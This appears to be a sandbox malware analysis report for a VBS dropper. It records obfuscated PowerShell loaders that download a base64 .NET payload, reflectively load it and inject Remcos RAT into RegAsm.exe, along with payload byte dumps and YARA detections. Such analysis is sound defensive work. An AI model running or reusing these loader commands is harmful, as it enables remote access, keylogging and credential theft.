                                                              2024-10-02 03:29:22 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                                              Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                                              2024-10-02 03:29:22 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                                              Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                                              2024-10-02 03:29:22 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                                              Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                                              2024-10-02 03:29:22 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                                              Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                                              2024-10-02 03:29:22 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                                              Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                                              2024-10-02 03:29:22 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                                              Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:4
                                                              Start time:23:29:15
                                                              Start date:01/10/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs"
                                                              Imagebase:0x7ff7d0ad0000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:8
                                                              Start time:23:29:16
                                                              Start date:01/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                              Imagebase:0x7ff7b2bb0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:23:29:16
                                                              Start date:01/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff620390000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:10
                                                              Start time:23:29:18
                                                              Start date:01/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
                                                              Imagebase:0x7ff7b2bb0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1436384107.0000026F45F00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1404922826.0000026F3DE40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:11
                                                              Start time:23:29:27
                                                              Start date:01/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                              Imagebase:0xb10000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:high
                                                              Has exited:false

                                                              Disassembly

                                                              Reset < >

                                                                Executed Functions

                                                                Function 00007FF7C0C937B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.1473112955.00007FF7C0C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0C90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff7c0c90000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                • Instruction ID: 205cdb3a226ffd02ad3aef0aed9c4cc0eba6500cc13b6e5054873e043159fd95
                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                • Instruction Fuzzy Hash: BE01A77010CB0C4FD744EF0CE451AA6B3E0FB85360F10052DE58AC3651D732E882CB41

                                                                Executed Functions

                                                                Function 00007FF7C0D60020 Relevance: 2.0, Strings: 1, Instructions: 730COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1445205927.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ff7c0d60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H
                                                                • API String ID: 0-2852464175
                                                                • Opcode ID: 77dff26fd8f230561c8aa8e5dc8dde692c94e33c1cd34aa5572663ddc10b1823
                                                                • Instruction ID: a260db3b5f60bdb70b053f426621ffbd71910ae1ce6550bd1ff4699b72bffe07
                                                                • Opcode Fuzzy Hash: 77dff26fd8f230561c8aa8e5dc8dde692c94e33c1cd34aa5572663ddc10b1823
                                                                • Instruction Fuzzy Hash: 35222861E0DAC94FE796AB2858646B5BFE1EF56320B4805FBC04DC7293DE18BC05C3A1
                                                                Function 00007FF7C0D6878E Relevance: .2, Instructions: 223COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1445205927.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ff7c0d60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46f91d31477813b3c9f4c02c67a429503b11f110a71f4844404e8ddfe6a157c4
                                                                • Instruction ID: 55e2d5231f2e0b531e57bbdc78cb6939d36e26af9c8065c89888d95e10368216
                                                                • Opcode Fuzzy Hash: 46f91d31477813b3c9f4c02c67a429503b11f110a71f4844404e8ddfe6a157c4
                                                                • Instruction Fuzzy Hash: A461FD26E0DE464FE795AA2854612B5F7E2EF457707D806BAC00DC73D3DE18BC448791
                                                                Function 00007FF7C0D6038E Relevance: .2, Instructions: 182COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1445205927.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ff7c0d60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 258d36a5fadec4109459f7bcac631669b5e57157a08d9c7e58b9d42fc591c101
                                                                • Instruction ID: 7de3e74e3450761af8bac0c68150ce64bc0ba1b634ce190f46867afb81ef2cb2
                                                                • Opcode Fuzzy Hash: 258d36a5fadec4109459f7bcac631669b5e57157a08d9c7e58b9d42fc591c101
                                                                • Instruction Fuzzy Hash: 3B512775E0DE890FE791EF284469675BFE0EF56220B8805FAC04EC7293EE18BC058390
                                                                Function 00007FF7C0D687DA Relevance: .1, Instructions: 141COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1445205927.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ff7c0d60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3742db4500b37d7165c788a4a36b7ae650c510f774fa2dd894cfa064c84cacba
                                                                • Instruction ID: b56711b2e66d4e2145c0491ef347b03ecae903e2fb5aebdea78332d2789b58fd
                                                                • Opcode Fuzzy Hash: 3742db4500b37d7165c788a4a36b7ae650c510f774fa2dd894cfa064c84cacba
                                                                • Instruction Fuzzy Hash: 0641CB26E0EE870FF7A5AB285865278E7E2AF457717D406BAC40DC33D2DE187C444792
                                                                Function 00007FF7C0D66931 Relevance: .1, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1445205927.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ff7c0d60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 62c589683f611ee158839c5b502d2a7fb231593399f1feab6613baa21577c1ba
                                                                • Instruction ID: f48d105b0db3661ba482ec6d297c015bdb7f4bda8c6963ffa55ef8046704375f
                                                                • Opcode Fuzzy Hash: 62c589683f611ee158839c5b502d2a7fb231593399f1feab6613baa21577c1ba
                                                                • Instruction Fuzzy Hash: 69217522E0EAC54FD355AB3C68552A47BD0EF5A3A071401BFD44CCB393EC282C0987A1
                                                                Function 00007FF7C0C95E85 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1444721163.00007FF7C0C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0C90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ff7c0c90000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 35339b6c69b93d0c10426023e51f378992843bab5feb8c2b3df5f2ab10f27cf2
                                                                • Instruction ID: a64982fb173603f2c4631b1368121bf61d09076d78e214477f5b242291024afa
                                                                • Opcode Fuzzy Hash: 35339b6c69b93d0c10426023e51f378992843bab5feb8c2b3df5f2ab10f27cf2
                                                                • Instruction Fuzzy Hash: 0801677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3651D736E981CB45

                                                                Non-executed Functions

                                                                Function 00007FF7C0C9A1F9 Relevance: .1, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1444721163.00007FF7C0C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0C90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ff7c0c90000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aa869274270e030493684c00a9e775d8782687ee3c5be18de0e0cb9a0b370171
                                                                • Instruction ID: 7a1e829d5807434198b08e833980b32095394090df302c4cbaecda35eb37fcc1
                                                                • Opcode Fuzzy Hash: aa869274270e030493684c00a9e775d8782687ee3c5be18de0e0cb9a0b370171
                                                                • Instruction Fuzzy Hash: 9051326284E7C14FD7139B708C625907FB0AF17224B4E05EBC4D5CF0E3E6596A5AD362

                                                                Execution Graph

                                                                Execution Coverage:3.5%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:5.1%
                                                                Total number of Nodes:1270
                                                                Total number of Limit Nodes:56
                                                                execution_graph 47188 4437fd 47189 443806 47188->47189 47190 44381f 47188->47190 47191 44380e 47189->47191 47195 443885 47189->47195 47193 443816 47193->47191 47206 443b52 22 API calls 2 library calls 47193->47206 47196 443891 47195->47196 47197 44388e 47195->47197 47207 44f45d GetEnvironmentStringsW 47196->47207 47197->47193 47202 4438d3 47202->47193 47203 4438a9 47215 446802 20 API calls _free 47203->47215 47205 44389e 47216 446802 20 API calls _free 47205->47216 47206->47190 47208 44f471 47207->47208 47209 443898 47207->47209 47217 4461b8 47208->47217 47209->47205 47214 4439aa 26 API calls 3 library calls 47209->47214 47211 44f485 ctype 47224 446802 20 API calls _free 47211->47224 47213 44f49f FreeEnvironmentStringsW 47213->47209 47214->47203 47215->47205 47216->47202 47218 4461f6 47217->47218 47222 4461c6 __Getctype 47217->47222 47226 44062d 20 API calls _free 47218->47226 47220 4461e1 RtlAllocateHeap 47221 4461f4 47220->47221 47220->47222 47221->47211 47222->47218 47222->47220 47225 443001 7 API calls 2 library calls 47222->47225 47224->47213 47225->47222 47226->47221 47227 43bea8 47228 43beb4 _swprintf ___scrt_is_nonwritable_in_current_image 47227->47228 47229 43bec2 47228->47229 47231 43beec 47228->47231 47243 44062d 20 API calls _free 47229->47243 47238 445909 EnterCriticalSection 47231->47238 47233 43bec7 pre_c_initialization ___scrt_is_nonwritable_in_current_image 47234 43bef7 47239 43bf98 47234->47239 47238->47234 47241 43bfa6 47239->47241 47240 43bf02 47244 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 47240->47244 47241->47240 47245 4497ec 37 API calls 2 library calls 47241->47245 47243->47233 47244->47233 47245->47241 47246 434918 47247 434924 ___scrt_is_nonwritable_in_current_image 47246->47247 47273 434627 47247->47273 47249 43492b 47251 434954 47249->47251 47571 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter 